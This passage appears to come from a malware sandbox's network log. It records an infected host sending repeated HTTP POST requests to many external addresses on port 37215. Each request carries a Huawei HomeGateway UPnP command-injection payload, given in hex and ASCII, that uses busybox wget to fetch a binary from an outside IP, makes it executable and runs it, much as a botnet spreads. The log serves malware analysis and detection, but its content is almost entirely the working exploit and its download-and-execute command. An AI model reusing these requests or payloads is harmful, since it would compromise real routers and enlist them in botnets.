68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            759192.168.2.154706841.138.5.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739511013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            760192.168.2.154301641.253.129.12537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739533901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            761192.168.2.153697441.242.9.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739559889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            762192.168.2.155513041.224.87.13337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739578962 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            763192.168.2.154700441.204.117.10037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739614964 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            764192.168.2.154990641.175.144.21837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739628077 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            765192.168.2.153731441.57.138.22337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739697933 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            766192.168.2.154600241.206.237.10537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739726067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            767192.168.2.153524241.195.252.23937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739742041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            768192.168.2.154028041.10.221.10637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739778042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            769192.168.2.155258841.118.56.23537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739778042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
